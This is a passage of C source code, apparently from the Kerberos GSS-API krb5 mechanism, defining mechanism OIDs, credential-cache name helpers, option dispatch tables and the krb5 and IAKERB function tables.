* Export of this software from the United States of America may require
* a specific license from the United States Government. It is the
* responsibility of any person or organization contemplating export to
* obtain such a license before exporting.
*
* WITHIN THAT CONSTRAINT, permission to use, copy, modify, and
* distribute this software and its documentation for any purpose and
* without fee is hereby granted, provided that the above copyright
* notice appear in all copies and that both that copyright notice and
* this permission notice appear in supporting documentation, and that
* the name of FundsXpress. not be used in advertising or publicity pertaining
* to distribution of the software without specific, written prior
* permission. FundsXpress makes no representations about the suitability of
* this software for any purpose. It is provided "as is" without express
* or implied warranty.
*
* THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR
* IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED
* WARRANTIES OF MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE.
*/
/*
* Copyright (c) 2006-2008, Novell, Inc.
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
*
* * Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* * The copyright holder's name is not used to endorse or promote products
* derived from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
* LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*/
/*
* $Id$
*/
/* For declaration of krb5_ser_context_init */
#include "k5-int.h"
#include "gssapiP_krb5.h"
#include "mglueP.h"
#ifndef NO_PASSWORD
#include <pwd.h>
#endif
/** exported constants defined in gssapi_krb5{,_nx}.h **/
/* these are bogus, but will compile */
/*
* The OID of the draft krb5 mechanism, assigned by IETF, is:
* iso(1) org(3) dod(5) internet(1) security(5)
* kerberosv5(2) = 1.3.5.1.5.2
* The OID of the krb5_name type is:
* iso(1) member-body(2) US(840) mit(113554) infosys(1) gssapi(2)
* krb5(2) krb5_name(1) = 1.2.840.113554.1.2.2.1
* The OID of the krb5_principal type is:
* iso(1) member-body(2) US(840) mit(113554) infosys(1) gssapi(2)
* krb5(2) krb5_principal(2) = 1.2.840.113554.1.2.2.2
* The OID of the proposed standard krb5 mechanism is:
* iso(1) member-body(2) US(840) mit(113554) infosys(1) gssapi(2)
* krb5(2) = 1.2.840.113554.1.2.2
* The OID of the proposed standard krb5 v2 mechanism is:
* iso(1) member-body(2) US(840) mit(113554) infosys(1) gssapi(2)
* krb5v2(3) = 1.2.840.113554.1.2.3
* Provisionally reserved for Kerberos session key algorithm
* identifiers is:
* iso(1) member-body(2) US(840) mit(113554) infosys(1) gssapi(2)
* krb5(2) krb5_enctype(4) = 1.2.840.113554.1.2.2.4
* Provisionally reserved for Kerberos mechanism-specific APIs:
* iso(1) member-body(2) US(840) mit(113554) infosys(1) gssapi(2)
* krb5(2) krb5_gssapi_ext(5) = 1.2.840.113554.1.2.2.5
*/
/*
* Encoding rules: The first two values are encoded in one byte as 40
* * value1 + value2. Subsequent values are encoded base 128, most
* significant digit first, with the high bit (\200) set on all octets
* except the last in each value's encoding.
*/
#define NO_CI_FLAGS_X_OID_LENGTH 6
#define NO_CI_FLAGS_X_OID "\x2a\x85\x70\x2b\x0d\x1d"
const gss_OID_desc krb5_gss_oid_array[] = {
/* this is the official, rfc-specified OID */
{GSS_MECH_KRB5_OID_LENGTH, GSS_MECH_KRB5_OID},
/* this pre-RFC mech OID */
{GSS_MECH_KRB5_OLD_OID_LENGTH, GSS_MECH_KRB5_OLD_OID},
/* this is the unofficial, incorrect mech OID emitted by MS */
{GSS_MECH_KRB5_WRONG_OID_LENGTH, GSS_MECH_KRB5_WRONG_OID},
/* IAKERB OID */
{GSS_MECH_IAKERB_OID_LENGTH, GSS_MECH_IAKERB_OID},
/* this is the v2 assigned OID */
{9, "\052\206\110\206\367\022\001\002\003"},
/* these two are name type OID's */
/* 2.1.1. Kerberos Principal Name Form: (rfc 1964)
* This name form shall be represented by the Object Identifier {iso(1)
* member-body(2) United States(840) mit(113554) infosys(1) gssapi(2)
* krb5(2) krb5_name(1)}. The recommended symbolic name for this type
* is "GSS_KRB5_NT_PRINCIPAL_NAME". */
{10, "\052\206\110\206\367\022\001\002\002\001"},
/* gss_nt_krb5_principal. Object identifier for a krb5_principal. Do not use. */
{10, "\052\206\110\206\367\022\001\002\002\002"},
{NO_CI_FLAGS_X_OID_LENGTH, NO_CI_FLAGS_X_OID},
{ 0, 0 }
};
const gss_OID_desc * const gss_mech_krb5 = krb5_gss_oid_array+0;
const gss_OID_desc * const gss_mech_krb5_old = krb5_gss_oid_array+1;
const gss_OID_desc * const gss_mech_krb5_wrong = krb5_gss_oid_array+2;
const gss_OID_desc * const gss_mech_iakerb = krb5_gss_oid_array+3;
const gss_OID_desc * const gss_nt_krb5_name = krb5_gss_oid_array+5;
const gss_OID_desc * const gss_nt_krb5_principal = krb5_gss_oid_array+6;
const gss_OID_desc * const GSS_KRB5_NT_PRINCIPAL_NAME = krb5_gss_oid_array+5;
const gss_OID_desc * const GSS_KRB5_CRED_NO_CI_FLAGS_X = krb5_gss_oid_array+7;
static const gss_OID_set_desc oidsets[] = {
{1, (gss_OID) krb5_gss_oid_array+0}, /* RFC OID */
{1, (gss_OID) krb5_gss_oid_array+1}, /* pre-RFC OID */
{3, (gss_OID) krb5_gss_oid_array+0}, /* all names for krb5 mech */
{4, (gss_OID) krb5_gss_oid_array+0}, /* all krb5 names and IAKERB */
};
const gss_OID_set_desc * const gss_mech_set_krb5 = oidsets+0;
const gss_OID_set_desc * const gss_mech_set_krb5_old = oidsets+1;
const gss_OID_set_desc * const gss_mech_set_krb5_both = oidsets+2;
const gss_OID_set_desc * const kg_all_mechs = oidsets+3;
g_set kg_vdb = G_SET_INIT;
/** default credential support */
/*
* init_sec_context() will explicitly re-acquire default credentials,
* so handling the expiration/invalidation condition here isn't needed.
*/
OM_uint32
kg_get_defcred(minor_status, cred)
OM_uint32 *minor_status;
gss_cred_id_t *cred;
{
OM_uint32 major;
if ((major = krb5_gss_acquire_cred(minor_status,
(gss_name_t) NULL, GSS_C_INDEFINITE,
GSS_C_NULL_OID_SET, GSS_C_INITIATE,
cred, NULL, NULL)) && GSS_ERROR(major)) {
return(major);
}
*minor_status = 0;
return(GSS_S_COMPLETE);
}
OM_uint32
kg_sync_ccache_name (krb5_context context, OM_uint32 *minor_status)
{
OM_uint32 err = 0;
/*
* Sync up the context ccache name with the GSSAPI ccache name.
* If kg_ccache_name is NULL -- normal unless someone has called
* gss_krb5_ccache_name() -- then the system default ccache will
* be picked up and used by resetting the context default ccache.
* This is needed for platforms which support multiple ccaches.
*/
if (!err) {
/* if NULL, resets the context default ccache */
err = krb5_cc_set_default_name(context,
(char *) k5_getspecific(K5_KEY_GSS_KRB5_CCACHE_NAME));
}
*minor_status = err;
return (*minor_status == 0) ? GSS_S_COMPLETE : GSS_S_FAILURE;
}
/* This function returns whether or not the caller set a cccache name. Used by
* gss_acquire_cred to figure out if the caller wants to only look at this
* ccache or search the cache collection for the desired name */
OM_uint32
kg_caller_provided_ccache_name (OM_uint32 *minor_status,
int *out_caller_provided_name)
{
if (out_caller_provided_name) {
*out_caller_provided_name =
(k5_getspecific(K5_KEY_GSS_KRB5_CCACHE_NAME) != NULL);
}
*minor_status = 0;
return GSS_S_COMPLETE;
}
OM_uint32
kg_get_ccache_name (OM_uint32 *minor_status, const char **out_name)
{
const char *name = NULL;
OM_uint32 err = 0;
char *kg_ccache_name;
kg_ccache_name = k5_getspecific(K5_KEY_GSS_KRB5_CCACHE_NAME);
if (kg_ccache_name != NULL) {
name = strdup(kg_ccache_name);
if (name == NULL)
err = ENOMEM;
} else {
krb5_context context = NULL;
/* Reset the context default ccache (see text above), and then
retrieve it. */
err = krb5_gss_init_context(&context);
if (!err)
err = krb5_cc_set_default_name (context, NULL);
if (!err) {
name = krb5_cc_default_name(context);
if (name) {
name = strdup(name);
if (name == NULL)
err = ENOMEM;
}
}
if (err && context)
save_error_info(err, context);
if (context)
krb5_free_context(context);
}
if (!err) {
if (out_name) {
*out_name = name;
}
}
*minor_status = err;
return (*minor_status == 0) ? GSS_S_COMPLETE : GSS_S_FAILURE;
}
OM_uint32
kg_set_ccache_name (OM_uint32 *minor_status, const char *name)
{
char *new_name = NULL;
char *swap = NULL;
char *kg_ccache_name;
krb5_error_code kerr;
if (name) {
new_name = strdup(name);
if (new_name == NULL) {
*minor_status = ENOMEM;
return GSS_S_FAILURE;
}
}
kg_ccache_name = k5_getspecific(K5_KEY_GSS_KRB5_CCACHE_NAME);
swap = kg_ccache_name;
kg_ccache_name = new_name;
new_name = swap;
kerr = k5_setspecific(K5_KEY_GSS_KRB5_CCACHE_NAME, kg_ccache_name);
if (kerr != 0) {
/* Can't store, so free up the storage. */
free(kg_ccache_name);
/* ??? free(new_name); */
*minor_status = kerr;
return GSS_S_FAILURE;
}
free (new_name);
*minor_status = 0;
return GSS_S_COMPLETE;
}
#define g_OID_prefix_equal(o1, o2) \
(((o1)->length >= (o2)->length) && \
(memcmp((o1)->elements, (o2)->elements, (o2)->length) == 0))
/*
* gss_inquire_sec_context_by_oid() methods
*/
static struct {
gss_OID_desc oid;
OM_uint32 (*func)(OM_uint32 *, const gss_ctx_id_t, const gss_OID, gss_buffer_set_t *);
} krb5_gss_inquire_sec_context_by_oid_ops[] = {
{
{GSS_KRB5_GET_TKT_FLAGS_OID_LENGTH, GSS_KRB5_GET_TKT_FLAGS_OID},
gss_krb5int_get_tkt_flags
},
{
{GSS_KRB5_EXTRACT_AUTHZ_DATA_FROM_SEC_CONTEXT_OID_LENGTH, GSS_KRB5_EXTRACT_AUTHZ_DATA_FROM_SEC_CONTEXT_OID},
gss_krb5int_extract_authz_data_from_sec_context
},
{
{GSS_KRB5_INQ_SSPI_SESSION_KEY_OID_LENGTH, GSS_KRB5_INQ_SSPI_SESSION_KEY_OID},
gss_krb5int_inq_session_key
},
{
{GSS_KRB5_EXPORT_LUCID_SEC_CONTEXT_OID_LENGTH, GSS_KRB5_EXPORT_LUCID_SEC_CONTEXT_OID},
gss_krb5int_export_lucid_sec_context
},
{
{GSS_KRB5_EXTRACT_AUTHTIME_FROM_SEC_CONTEXT_OID_LENGTH, GSS_KRB5_EXTRACT_AUTHTIME_FROM_SEC_CONTEXT_OID},
gss_krb5int_extract_authtime_from_sec_context
}
};
OM_uint32 KRB5_CALLCONV
krb5_gss_inquire_sec_context_by_oid (OM_uint32 *minor_status,
const gss_ctx_id_t context_handle,
const gss_OID desired_object,
gss_buffer_set_t *data_set)
{
krb5_gss_ctx_id_rec *ctx;
size_t i;
if (minor_status == NULL)
return GSS_S_CALL_INACCESSIBLE_WRITE;
*minor_status = 0;
if (desired_object == GSS_C_NO_OID)
return GSS_S_CALL_INACCESSIBLE_READ;
if (data_set == NULL)
return GSS_S_CALL_INACCESSIBLE_WRITE;
*data_set = GSS_C_NO_BUFFER_SET;
ctx = (krb5_gss_ctx_id_rec *) context_handle;
if (ctx->terminated || !ctx->established)
return GSS_S_NO_CONTEXT;
for (i = 0; i < sizeof(krb5_gss_inquire_sec_context_by_oid_ops)/
sizeof(krb5_gss_inquire_sec_context_by_oid_ops[0]); i++) {
if (g_OID_prefix_equal(desired_object, &krb5_gss_inquire_sec_context_by_oid_ops[i].oid)) {
return (*krb5_gss_inquire_sec_context_by_oid_ops[i].func)(minor_status,
context_handle,
desired_object,
data_set);
}
}
*minor_status = EINVAL;
return GSS_S_UNAVAILABLE;
}
/*
* gss_inquire_cred_by_oid() methods
*/
#if 0
static struct {
gss_OID_desc oid;
OM_uint32 (*func)(OM_uint32 *, const gss_cred_id_t, const gss_OID, gss_buffer_set_t *);
} krb5_gss_inquire_cred_by_oid_ops[] = {
};
#endif
static OM_uint32 KRB5_CALLCONV
krb5_gss_inquire_cred_by_oid(OM_uint32 *minor_status,
const gss_cred_id_t cred_handle,
const gss_OID desired_object,
gss_buffer_set_t *data_set)
{
OM_uint32 major_status = GSS_S_FAILURE;
#if 0
size_t i;
#endif
if (minor_status == NULL)
return GSS_S_CALL_INACCESSIBLE_WRITE;
*minor_status = 0;
if (desired_object == GSS_C_NO_OID)
return GSS_S_CALL_INACCESSIBLE_READ;
if (data_set == NULL)
return GSS_S_CALL_INACCESSIBLE_WRITE;
*data_set = GSS_C_NO_BUFFER_SET;
if (cred_handle == GSS_C_NO_CREDENTIAL) {
*minor_status = (OM_uint32)KRB5_NOCREDS_SUPPLIED;
return GSS_S_NO_CRED;
}
major_status = krb5_gss_validate_cred(minor_status, cred_handle);
if (GSS_ERROR(major_status))
return major_status;
#if 0
for (i = 0; i < sizeof(krb5_gss_inquire_cred_by_oid_ops)/
sizeof(krb5_gss_inquire_cred_by_oid_ops[0]); i++) {
if (g_OID_prefix_equal(desired_object, &krb5_gss_inquire_cred_by_oid_ops[i].oid)) {
return (*krb5_gss_inquire_cred_by_oid_ops[i].func)(minor_status,
cred_handle,
desired_object,
data_set);
}
}
#endif
*minor_status = EINVAL;
return GSS_S_UNAVAILABLE;
}
/*
* gss_set_sec_context_option() methods
* (Disabled until we have something to populate the array.)
*/
#if 0
static struct {
gss_OID_desc oid;
OM_uint32 (*func)(OM_uint32 *, gss_ctx_id_t *, const gss_OID, const gss_buffer_t);
} krb5_gss_set_sec_context_option_ops[] = {
};
#endif
OM_uint32 KRB5_CALLCONV
krb5_gss_set_sec_context_option (OM_uint32 *minor_status,
gss_ctx_id_t *context_handle,
const gss_OID desired_object,
const gss_buffer_t value)
{
#if 0
size_t i;
#endif
if (minor_status == NULL)
return GSS_S_CALL_INACCESSIBLE_WRITE;
*minor_status = 0;
if (context_handle == NULL)
return GSS_S_CALL_INACCESSIBLE_READ;
if (desired_object == GSS_C_NO_OID)
return GSS_S_CALL_INACCESSIBLE_READ;
#if 0
for (i = 0; i < sizeof(krb5_gss_set_sec_context_option_ops)/
sizeof(krb5_gss_set_sec_context_option_ops[0]); i++) {
if (g_OID_prefix_equal(desired_object, &krb5_gss_set_sec_context_option_ops[i].oid)) {
return (*krb5_gss_set_sec_context_option_ops[i].func)(minor_status,
context_handle,
desired_object,
value);
}
}
#endif
*minor_status = EINVAL;
return GSS_S_UNAVAILABLE;
}
static OM_uint32
no_ci_flags(OM_uint32 *minor_status,
gss_cred_id_t *cred_handle,
const gss_OID desired_oid,
const gss_buffer_t value)
{
krb5_gss_cred_id_t cred;
cred = (krb5_gss_cred_id_t) *cred_handle;
cred->suppress_ci_flags = 1;
*minor_status = 0;
return GSS_S_COMPLETE;
}
/*
* gssspi_set_cred_option() methods
*/
static struct {
gss_OID_desc oid;
OM_uint32 (*func)(OM_uint32 *, gss_cred_id_t *, const gss_OID, const gss_buffer_t);
} krb5_gssspi_set_cred_option_ops[] = {
{
{GSS_KRB5_COPY_CCACHE_OID_LENGTH, GSS_KRB5_COPY_CCACHE_OID},
gss_krb5int_copy_ccache
},
{
{GSS_KRB5_SET_ALLOWABLE_ENCTYPES_OID_LENGTH, GSS_KRB5_SET_ALLOWABLE_ENCTYPES_OID},
gss_krb5int_set_allowable_enctypes
},
{
{GSS_KRB5_SET_CRED_RCACHE_OID_LENGTH, GSS_KRB5_SET_CRED_RCACHE_OID},
gss_krb5int_set_cred_rcache
},
{
{GSS_KRB5_IMPORT_CRED_OID_LENGTH, GSS_KRB5_IMPORT_CRED_OID},
gss_krb5int_import_cred
},
{
{NO_CI_FLAGS_X_OID_LENGTH, NO_CI_FLAGS_X_OID},
no_ci_flags
},
};
static OM_uint32 KRB5_CALLCONV
krb5_gssspi_set_cred_option(OM_uint32 *minor_status,
gss_cred_id_t *cred_handle,
const gss_OID desired_object,
const gss_buffer_t value)
{
OM_uint32 major_status = GSS_S_FAILURE;
size_t i;
if (minor_status == NULL)
return GSS_S_CALL_INACCESSIBLE_WRITE;
if (cred_handle == NULL)
return GSS_S_CALL_INACCESSIBLE_WRITE;
*minor_status = 0;
if (desired_object == GSS_C_NO_OID)
return GSS_S_CALL_INACCESSIBLE_READ;
if (*cred_handle != GSS_C_NO_CREDENTIAL) {
major_status = krb5_gss_validate_cred(minor_status, *cred_handle);
if (GSS_ERROR(major_status))
return major_status;
}
for (i = 0; i < sizeof(krb5_gssspi_set_cred_option_ops)/
sizeof(krb5_gssspi_set_cred_option_ops[0]); i++) {
if (g_OID_prefix_equal(desired_object, &krb5_gssspi_set_cred_option_ops[i].oid)) {
return (*krb5_gssspi_set_cred_option_ops[i].func)(minor_status,
cred_handle,
desired_object,
value);
}
}
*minor_status = EINVAL;
return GSS_S_UNAVAILABLE;
}
/*
* gssspi_mech_invoke() methods
*/
static struct {
gss_OID_desc oid;
OM_uint32 (*func)(OM_uint32 *, const gss_OID, const gss_OID, gss_buffer_t);
} krb5_gssspi_mech_invoke_ops[] = {
{
{GSS_KRB5_REGISTER_ACCEPTOR_IDENTITY_OID_LENGTH, GSS_KRB5_REGISTER_ACCEPTOR_IDENTITY_OID},
gss_krb5int_register_acceptor_identity
},
{
{GSS_KRB5_CCACHE_NAME_OID_LENGTH, GSS_KRB5_CCACHE_NAME_OID},
gss_krb5int_ccache_name
},
{
{GSS_KRB5_FREE_LUCID_SEC_CONTEXT_OID_LENGTH, GSS_KRB5_FREE_LUCID_SEC_CONTEXT_OID},
gss_krb5int_free_lucid_sec_context
},
#ifndef _WIN32
{
{GSS_KRB5_USE_KDC_CONTEXT_OID_LENGTH, GSS_KRB5_USE_KDC_CONTEXT_OID},
krb5int_gss_use_kdc_context
},
#endif
};
static OM_uint32 KRB5_CALLCONV
krb5_gssspi_mech_invoke (OM_uint32 *minor_status,
const gss_OID desired_mech,
const gss_OID desired_object,
gss_buffer_t value)
{
size_t i;
if (minor_status == NULL)
return GSS_S_CALL_INACCESSIBLE_WRITE;
*minor_status = 0;
if (desired_mech == GSS_C_NO_OID)
return GSS_S_BAD_MECH;
if (desired_object == GSS_C_NO_OID)
return GSS_S_CALL_INACCESSIBLE_READ;
for (i = 0; i < sizeof(krb5_gssspi_mech_invoke_ops)/
sizeof(krb5_gssspi_mech_invoke_ops[0]); i++) {
if (g_OID_prefix_equal(desired_object, &krb5_gssspi_mech_invoke_ops[i].oid)) {
return (*krb5_gssspi_mech_invoke_ops[i].func)(minor_status,
desired_mech,
desired_object,
value);
}
}
*minor_status = EINVAL;
return GSS_S_UNAVAILABLE;
}
#define GS2_KRB5_SASL_NAME "GS2-KRB5"
#define GS2_KRB5_SASL_NAME_LEN (sizeof(GS2_KRB5_SASL_NAME) - 1)
#define GS2_IAKERB_SASL_NAME "GS2-IAKERB"
#define GS2_IAKERB_SASL_NAME_LEN (sizeof(GS2_IAKERB_SASL_NAME) - 1)
static OM_uint32 KRB5_CALLCONV
krb5_gss_inquire_mech_for_saslname(OM_uint32 *minor_status,
const gss_buffer_t sasl_mech_name,
gss_OID *mech_type)
{
*minor_status = 0;
if (sasl_mech_name->length == GS2_KRB5_SASL_NAME_LEN &&
memcmp(sasl_mech_name->value,
GS2_KRB5_SASL_NAME, GS2_KRB5_SASL_NAME_LEN) == 0) {
if (mech_type != NULL)
*mech_type = (gss_OID)gss_mech_krb5;
return GSS_S_COMPLETE;
} else if (sasl_mech_name->length == GS2_IAKERB_SASL_NAME_LEN &&
memcmp(sasl_mech_name->value,
GS2_IAKERB_SASL_NAME, GS2_IAKERB_SASL_NAME_LEN) == 0) {
if (mech_type != NULL)
*mech_type = (gss_OID)gss_mech_iakerb;
return GSS_S_COMPLETE;
}
return GSS_S_BAD_MECH;
}
static OM_uint32 KRB5_CALLCONV
krb5_gss_inquire_saslname_for_mech(OM_uint32 *minor_status,
const gss_OID desired_mech,
gss_buffer_t sasl_mech_name,
gss_buffer_t mech_name,
gss_buffer_t mech_description)
{
if (g_OID_equal(desired_mech, gss_mech_iakerb)) {
if (!g_make_string_buffer(GS2_IAKERB_SASL_NAME, sasl_mech_name) ||
!g_make_string_buffer("iakerb", mech_name) ||
!g_make_string_buffer("Initial and Pass Through Authentication "
"Kerberos Mechanism (IAKERB)",
mech_description))
goto fail;
} else {
if (!g_make_string_buffer(GS2_KRB5_SASL_NAME, sasl_mech_name) ||
!g_make_string_buffer("krb5", mech_name) ||
!g_make_string_buffer("Kerberos 5 GSS-API Mechanism",
mech_description))
goto fail;
}
*minor_status = 0;
return GSS_S_COMPLETE;
fail:
*minor_status = ENOMEM;
return GSS_S_FAILURE;
}
static OM_uint32 KRB5_CALLCONV
krb5_gss_inquire_attrs_for_mech(OM_uint32 *minor_status,
gss_const_OID mech,
gss_OID_set *mech_attrs,
gss_OID_set *known_mech_attrs)
{
OM_uint32 major, tmpMinor;
if (mech_attrs == NULL) {
*minor_status = 0;
return GSS_S_COMPLETE;
}
major = gss_create_empty_oid_set(minor_status, mech_attrs);
if (GSS_ERROR(major))
goto cleanup;
#define MA_SUPPORTED(ma) do { \
major = gss_add_oid_set_member(minor_status, (gss_OID)ma, \
mech_attrs); \
if (GSS_ERROR(major)) \
goto cleanup; \
} while (0)
MA_SUPPORTED(GSS_C_MA_MECH_CONCRETE);
MA_SUPPORTED(GSS_C_MA_ITOK_FRAMED);
MA_SUPPORTED(GSS_C_MA_AUTH_INIT);
MA_SUPPORTED(GSS_C_MA_AUTH_TARG);
MA_SUPPORTED(GSS_C_MA_DELEG_CRED);
MA_SUPPORTED(GSS_C_MA_INTEG_PROT);
MA_SUPPORTED(GSS_C_MA_CONF_PROT);
MA_SUPPORTED(GSS_C_MA_MIC);
MA_SUPPORTED(GSS_C_MA_WRAP);
MA_SUPPORTED(GSS_C_MA_PROT_READY);
MA_SUPPORTED(GSS_C_MA_REPLAY_DET);
MA_SUPPORTED(GSS_C_MA_OOS_DET);
MA_SUPPORTED(GSS_C_MA_CBINDINGS);
MA_SUPPORTED(GSS_C_MA_CTX_TRANS);
if (g_OID_equal(mech, gss_mech_iakerb)) {
MA_SUPPORTED(GSS_C_MA_AUTH_INIT_INIT);
MA_SUPPORTED(GSS_C_MA_NOT_DFLT_MECH);
} else if (!g_OID_equal(mech, gss_mech_krb5)) {
MA_SUPPORTED(GSS_C_MA_DEPRECATED);
}
cleanup:
if (GSS_ERROR(major))
gss_release_oid_set(&tmpMinor, mech_attrs);
return major;
}
static OM_uint32 KRB5_CALLCONV
krb5_gss_localname(OM_uint32 *minor,
const gss_name_t pname,
const gss_const_OID mech_type,
gss_buffer_t localname)
{
krb5_context context;
krb5_error_code code;
krb5_gss_name_t kname;
char lname[BUFSIZ];
code = krb5_gss_init_context(&context);
if (code != 0) {
*minor = code;
return GSS_S_FAILURE;
}
kname = (krb5_gss_name_t)pname;
code = krb5_aname_to_localname(context, kname->princ,
sizeof(lname), lname);
if (code != 0) {
*minor = KRB5_NO_LOCALNAME;
krb5_free_context(context);
return GSS_S_FAILURE;
}
krb5_free_context(context);
localname->value = gssalloc_strdup(lname);
localname->length = strlen(lname);
return (code == 0) ? GSS_S_COMPLETE : GSS_S_FAILURE;
}
static OM_uint32 KRB5_CALLCONV
krb5_gss_authorize_localname(OM_uint32 *minor,
const gss_name_t pname,
gss_const_buffer_t local_user,
gss_const_OID name_type)
{
krb5_context context;
krb5_error_code code;
krb5_gss_name_t kname;
char *user;
int user_ok;
if (name_type != GSS_C_NO_OID &&
!g_OID_equal(name_type, GSS_C_NT_USER_NAME)) {
return GSS_S_BAD_NAMETYPE;
}
kname = (krb5_gss_name_t)pname;
code = krb5_gss_init_context(&context);
if (code != 0) {
*minor = code;
return GSS_S_FAILURE;
}
user = k5memdup0(local_user->value, local_user->length, &code);
if (user == NULL) {
*minor = code;
krb5_free_context(context);
return GSS_S_FAILURE;
}
user_ok = krb5_kuserok(context, kname->princ, user);
free(user);
krb5_free_context(context);
*minor = 0;
return user_ok ? GSS_S_COMPLETE : GSS_S_UNAUTHORIZED;
}
static struct gss_config krb5_mechanism = {
{ GSS_MECH_KRB5_OID_LENGTH, GSS_MECH_KRB5_OID },
NULL,
krb5_gss_acquire_cred,
krb5_gss_release_cred,
krb5_gss_init_sec_context,
#ifdef LEAN_CLIENT
NULL,
#else
krb5_gss_accept_sec_context,
#endif
krb5_gss_process_context_token,
krb5_gss_delete_sec_context,
krb5_gss_context_time,
krb5_gss_get_mic,
krb5_gss_verify_mic,
#if defined(IOV_SHIM_EXERCISE_WRAP) || defined(IOV_SHIM_EXERCISE)
NULL,
#else
krb5_gss_wrap,
#endif
#if defined(IOV_SHIM_EXERCISE_UNWRAP) || defined(IOV_SHIM_EXERCISE)
NULL,
#else
krb5_gss_unwrap,
#endif
krb5_gss_display_status,
krb5_gss_indicate_mechs,
krb5_gss_compare_name,
krb5_gss_display_name,
krb5_gss_import_name,
krb5_gss_release_name,
krb5_gss_inquire_cred,
NULL, /* add_cred */
#ifdef LEAN_CLIENT
NULL,
NULL,
#else
krb5_gss_export_sec_context,
krb5_gss_import_sec_context,
#endif
krb5_gss_inquire_cred_by_mech,
krb5_gss_inquire_names_for_mech,
krb5_gss_inquire_context,
krb5_gss_internal_release_oid,
krb5_gss_wrap_size_limit,
krb5_gss_localname,
krb5_gss_authorize_localname,
krb5_gss_export_name,
krb5_gss_duplicate_name,
krb5_gss_store_cred,
krb5_gss_inquire_sec_context_by_oid,
krb5_gss_inquire_cred_by_oid,
krb5_gss_set_sec_context_option,
krb5_gssspi_set_cred_option,
krb5_gssspi_mech_invoke,
NULL, /* wrap_aead */
NULL, /* unwrap_aead */
krb5_gss_wrap_iov,
krb5_gss_unwrap_iov,
krb5_gss_wrap_iov_length,
NULL, /* complete_auth_token */
krb5_gss_acquire_cred_impersonate_name,
NULL, /* krb5_gss_add_cred_impersonate_name */
NULL, /* display_name_ext */
krb5_gss_inquire_name,
krb5_gss_get_name_attribute,
krb5_gss_set_name_attribute,
krb5_gss_delete_name_attribute,
krb5_gss_export_name_composite,
krb5_gss_map_name_to_any,
krb5_gss_release_any_name_mapping,
krb5_gss_pseudo_random,
NULL, /* set_neg_mechs */
krb5_gss_inquire_saslname_for_mech,
krb5_gss_inquire_mech_for_saslname,
krb5_gss_inquire_attrs_for_mech,
krb5_gss_acquire_cred_from,
krb5_gss_store_cred_into,
krb5_gss_acquire_cred_with_password,
krb5_gss_export_cred,
krb5_gss_import_cred,
NULL, /* import_sec_context_by_mech */
NULL, /* import_name_by_mech */
NULL, /* import_cred_by_mech */
krb5_gss_get_mic_iov,
krb5_gss_verify_mic_iov,
krb5_gss_get_mic_iov_length,
};
/* Functions which use security contexts or acquire creds are IAKERB-specific;
* other functions can borrow from the krb5 mech. */
static struct gss_config iakerb_mechanism = {
{ GSS_MECH_KRB5_OID_LENGTH, GSS_MECH_KRB5_OID },
NULL,
iakerb_gss_acquire_cred,
krb5_gss_release_cred,
iakerb_gss_init_sec_context,
#ifdef LEAN_CLIENT
NULL,
#else
iakerb_gss_accept_sec_context,
#endif
iakerb_gss_process_context_token,
iakerb_gss_delete_sec_context,
iakerb_gss_context_time,
iakerb_gss_get_mic,
iakerb_gss_verify_mic,
#if defined(IOV_SHIM_EXERCISE_WRAP) || defined(IOV_SHIM_EXERCISE)
NULL,
#else
iakerb_gss_wrap,
#endif
#if defined(IOV_SHIM_EXERCISE_UNWRAP) || defined(IOV_SHIM_EXERCISE)
NULL,
#else
iakerb_gss_unwrap,
#endif
krb5_gss_display_status,
krb5_gss_indicate_mechs,
krb5_gss_compare_name,
krb5_gss_display_name,
krb5_gss_import_name,
krb5_gss_release_name,
krb5_gss_inquire_cred,
NULL, /* add_cred */
#ifdef LEAN_CLIENT
NULL,
NULL,
#else
iakerb_gss_export_sec_context,
NULL,
#endif
krb5_gss_inquire_cred_by_mech,
krb5_gss_inquire_names_for_mech,
iakerb_gss_inquire_context,
krb5_gss_internal_release_oid,
iakerb_gss_wrap_size_limit,
krb5_gss_localname,
krb5_gss_authorize_localname,
krb5_gss_export_name,
krb5_gss_duplicate_name,
krb5_gss_store_cred,
iakerb_gss_inquire_sec_context_by_oid,
krb5_gss_inquire_cred_by_oid,
iakerb_gss_set_sec_context_option,
krb5_gssspi_set_cred_option,
krb5_gssspi_mech_invoke,
NULL, /* wrap_aead */
NULL, /* unwrap_aead */
iakerb_gss_wrap_iov,
iakerb_gss_unwrap_iov,
iakerb_gss_wrap_iov_length,
NULL, /* complete_auth_token */
NULL, /* acquire_cred_impersonate_name */
NULL, /* add_cred_impersonate_name */
NULL, /* display_name_ext */
krb5_gss_inquire_name,
krb5_gss_get_name_attribute,
krb5_gss_set_name_attribute,
krb5_gss_delete_name_attribute,
krb5_gss_export_name_composite,
krb5_gss_map_name_to_any,
krb5_gss_release_any_name_mapping,
iakerb_gss_pseudo_random,
NULL, /* set_neg_mechs */
krb5_gss_inquire_saslname_for_mech,
krb5_gss_inquire_mech_for_saslname,
krb5_gss_inquire_attrs_for_mech,
krb5_gss_acquire_cred_from,
krb5_gss_store_cred_into,
